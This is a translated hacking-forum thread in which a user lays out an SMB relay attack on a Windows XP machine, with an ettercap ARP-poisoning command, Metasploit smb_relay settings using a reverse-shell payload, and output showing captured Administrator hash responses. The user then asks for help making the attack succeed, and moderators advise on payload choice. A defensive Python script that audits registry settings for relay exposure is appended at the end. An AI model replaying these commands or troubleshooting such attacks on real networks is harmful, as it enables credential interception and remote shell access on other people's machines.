
Thread: [problem] Windows SMB_Relay_Exploit

  1. #1
    Just burned his ISO

    Hello, and congratulations on the forum; one in Italian was really needed.
    So, after reading up a lot on this type of attack, I wanted to put what I had learned into practice (on my own LAN), and to tell the truth I did not run into any big problems...
    I launch etterfilter: etterfilter smb.filtr -o smb.ef
    and create the filter smb.ef

    After going through the whole procedure I launched the Metasploit framework like this:
    Code:
    msf > use windows/smb/smb_relay
    msf exploit(smb_relay) > set PAYLOAD windows/shell_reverse_tcp
    PAYLOAD => windows/shell_reverse_tcp
    msf exploit(smb_relay) > set LHOST 192.168.1.101
    LHOST => 192.168.1.101
    msf exploit(smb_relay) > exploit
    and it answers like this:
    Code:
    [*] Started reverse handler
    [*] Server started.
    then I launch ettercap:
    Code:
    ettercap -T -q -F smb.ef -M ARP /192.168.1.219/ // -P autoadd -i wlan0
    which answers like this:
    Code:
    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
    
    Content filters loaded from smb.ef...
    Listening on wlan0... (Ethernet)
    
     wlan0 ->	00:21:5C:5B:78:3D     192.168.1.101     255.255.255.0
    
    Privileges dropped to UID 0 GID 0...
    
      28 plugins
      39 protocol dissectors
      53 ports monitored
    7587 mac vendor fingerprint
    1698 tcp OS fingerprint
    2183 known services
    
    Randomizing 255 hosts for scanning...
    Scanning the whole netmask for 255 hosts...
    * |==================================================>| 100.00 %
    
    2 hosts added to the hosts list...
    
    ARP poisoning victims:
    
     GROUP 1 : 192.168.1.219 00:21:00:A7:73:2C
    
     GROUP 2 : ANY (all the hosts in the list)
    Starting Unified sniffing...
    
    
    Text only Interface activated...
    Hit 'h' for inline help
    
    Activating autoadd plugin...
    
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    SMB : 192.168.1.219:445 -> USER: Administrator  HASH: Administrator:"":"":314BB7C384593DD443F91FEAF2326D43AF1A88BDA1960CD3:4DA5D30CAAD1D1E4BBCEC8B6693C400B5E1D9473424237D4:FD43469EB47B7334 DOMAIN: ROSA-05AA89B2DC
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    zapped Accept-Encoding!
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    SMB : 192.168.1.219:445 -> USER: Administrator  HASH: Administrator:"":"":333A14003623CB05F891582CC563BFF2E93C97CB73DAA14E:478D5B65AACA953D89FB93B35C8A4584D3A672CD85789227:07E53BAB55E2A30C DOMAIN: ROSA-05AA89B2DC
    zapped Accept-Encoding!
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    SMB : 192.168.1.219:445 -> USER: Administrator  HASH: Administrator:"":"":B61EE890E9CB128759B3811A16AE0E2BD06512E74987045E:F7D041DC3A3EB9DA7F51B73F62302290F7C87DF97CB20906:669576B1CB6139DE DOMAIN: ROSA-05AA89B2DC
    SMB : 192.168.1.219:445 -> USER: Administrator  HASH: Administrator:"":"":767E2FE48A98D3584DE30B198B245376C9B72C77AD71DA80:1B832A99DA71AC94DBE2B6A36B8658F422CF0723B08B124B:80EE4F0BBE043EB2 DOMAIN: ROSA-05AA89B2DC
    
    
    while in the shell where I launched Metasploit it answers in this other way:
    *] Received 192.168.1.219:1083 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1083 \[*] Received 192.168.1.219:1083 ROSA-05AA89B2DC\Administrator LMHASH:51fc5aa9fa03b225c554178c8e3d26165a4d84307fea1452 NTHASH:1f8d89cf41613d62a722874989f8071df2ee1436e73db7aa OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
     
    [-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
     [*] Sending Access Denied to 192.168.1.219:1083 ROSA-05AA89B2DC\Administrator[*] Received 192.168.1.219:1088 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1088 \[*] Received 192.168.1.219:1088 ROSA-05AA89B2DC\Administrator LMHASH:314bb7c384593dd443f91feaf2326d43af1a88bda1960cd3 NTHASH:4da5d30caad1d1e4bbcec8b6693c400b5e1d9473424237d4 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
     
    [-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
     [*] Sending Access Denied to 192.168.1.219:1088 ROSA-05AA89B2DC\Administrator[*] Received 192.168.1.219:1090 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1090 \[*] Received 192.168.1.219:1090 ROSA-05AA89B2DC\Administrator LMHASH:333a14003623cb05f891582cc563bff2e93c97cb73daa14e NTHASH:478d5b65aaca953d89fb93b35c8a4584d3a672cd85789227 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
     
    [-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
     [*] Sending Access Denied to 192.168.1.219:1090 ROSA-05AA89B2DC\Administrator[*] Received 192.168.1.219:1094 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1094 \[*] Received 192.168.1.219:1094 ROSA-05AA89B2DC\Administrator LMHASH:69eef1310ae7f64ffd17c6cd0caaffa57fcf27a367bfb8c2 NTHASH:400902aab37704d33435c211d85a4dff5bf9a3056bf6d709 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...[*] Sending Access Denied to 192.168.1.219:1101 ROSA-05AA89B2DC\Administrator[*] Received 192.168.1.219:1105 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1105 \[*] Received 192.168.1.219:1105 ROSA-05AA89B2DC\Administrator LMHASH:767e2fe48a98d3584de30b198b245376c9b72c77ad71da80 NTHASH:1b832a99da71ac94dbe2b6a36b8658f422cf0723b08b124b OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
     
    [-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
     [*] Sending Access Denied to 192.168.1.219:1105 ROSA-05AA89B2DC\Administrator[*] Received 192.168.1.219:1107 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1107 \[*] Received 192.168.1.219:1107 ROSA-05AA89B2DC\Administrator LMHASH:98c0c5fbfb87fbc3adb95b2db6578a4445e3345fc51f587c NTHASH:53f951431ed067d70f98715c319c186756a774e23f01b989 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
     
    [-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.
     [*] Sending Access Denied to 192.168.1.219:1107 ROSA-05AA89B2DC\Administrator[*] Received 192.168.1.219:1109 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.219:1109 \[*] Received 192.168.1.219:1109 ROSA-05AA89B2DC\Administrator LMHASH:3f054f5f7de50f747787772ef1ff004d726ea4b233e2014b NTHASH:8a5c477a0e529d542b4aa2b6eadf4a3887928bb03804ef9d OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.219 as ROSA-05AA89B2DC\Administrator...[*] AUTHENTICATED as ROSA-05AA89B2DC\Administrator...
    Basically it says that the remote host has only provided us with the client's privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain only provide the client's network login privileges by default.
    What does it mean? How do I fix it so that the attack goes through completely?
    THANKS TO EVERYONE...




  2. #2
    Moderator

    Once again, read the rules: you opened 2 posts for the same question. When you need to post code, use the CODE tags.

  3. #3
    Just burned his ISO

    Sorry brigante, then can you tell me what causes this error:
    Code:
    [-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by
    THANKS

  4. #4
    Moderator

    Just translate it, and check whether the payload is the right one.

    Maybe also read the PDF published on pool.backtrack.it in the relevant section.

  5. #5
    Just burned his ISO

    The PAYLOAD I used was this one: set PAYLOAD windows/shell_reverse_tcp. I configured it, but I don't know why it gives me this error; it says: the remote host has only provided us with the client's privileges. Please make sure that the correct username and password have been provided
    From what I could understand, maybe my other PC (the one I ran the attack against) is patched against this type of attack, but I need to understand why. I would be grateful to everyone for helping me understand this error, thanks..
    Nice PDF, the explanation is well done and very clear...

  6. #6
    Moderator

    Indeed, I told you to read the PDF because it explains that:

    Code:
    windows/shell/reverse_tcp
    and

    Code:
    windows/shell_reverse_tcp
    are two different payloads, which must be chosen according to the patch level of the victim system.

  7. #7
    Just burned his ISO

    No luck, I also tried with:
    Code:
    windows/shell/reverse_tcp
    It still gives me the same error.
    Sorry, for this type of attack, does the victim's PC need to have shared folders or not....
    THANKS

  8. #8
    Moderator

    Sorry, for this type of attack, does the victim's PC need to have shared folders or not....
    These are things you need to know yourself, even before choosing the exploit.

  9. #9
    Just burned his ISO

    What does that mean? I'm asking you because you are more experienced, because I did not create any share on the PC I attacked.... and I was asking you: since this Metasploit exploits sharing, isn't it precisely this that is causing the error, or am I wrong..
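
Added example, not part of the original thread: the FAILED message quoted in the posts refers to the Windows XP default that maps network logons to Guest on machines outside a domain. This Python sketch audits a registry export for that setting (ForceGuest) together with SMB signing and the LM compatibility level, which decide how exposed a host is to SMB relay; the sample export is constructed, and treating a missing value as 0 is an assumption.

```python
import re

# Constructed sample: excerpt of a regedit export from a standalone Windows XP host.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"forceguest"=dword:00000001
"lmcompatibilitylevel"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"requiresecuritysignature"=dword:00000000
'''

LSA = r"hkey_local_machine\system\currentcontrolset\control\lsa"
SRV = r"hkey_local_machine\system\currentcontrolset\services\lanmanserver\parameters"

def parse_reg(text):
    """Return {(key, value_name): int} for every DWORD in a .reg export (lower-cased)."""
    values, key = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            key = m.group(1).lower()
            continue
        m = re.fullmatch(r'"([^"]+)"=dword:([0-9a-fA-F]{8})', line)
        if m and key:
            values[(key, m.group(1).lower())] = int(m.group(2), 16)
    return values

def audit(text):
    """Return (setting, finding) pairs relevant to SMB relay exposure."""
    v = parse_reg(text)
    findings = []
    # Assumption: a missing RequireSecuritySignature means signing is not required.
    if v.get((SRV, "requiresecuritysignature"), 0) != 1:
        findings.append(("RequireSecuritySignature",
                         "SMB signing not required: relayed logons are not rejected"))
    # Assumption: missing means 0; below 3 the host still sends LM/NTLMv1 responses.
    if v.get((LSA, "lmcompatibilitylevel"), 0) < 3:
        findings.append(("LmCompatibilityLevel", "LM/NTLMv1 responses are sent"))
    fg = v.get((LSA, "forceguest"))
    if fg == 1:
        findings.append(("ForceGuest",
                         "network logons with local accounts are mapped to Guest"))
    elif fg == 0:
        findings.append(("ForceGuest",
                         "local accounts log on as themselves; require SMB signing"))
    return findings
```

ForceGuest only limits what a network logon can do; requiring SMB signing is the setting that makes a relayed session fail.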
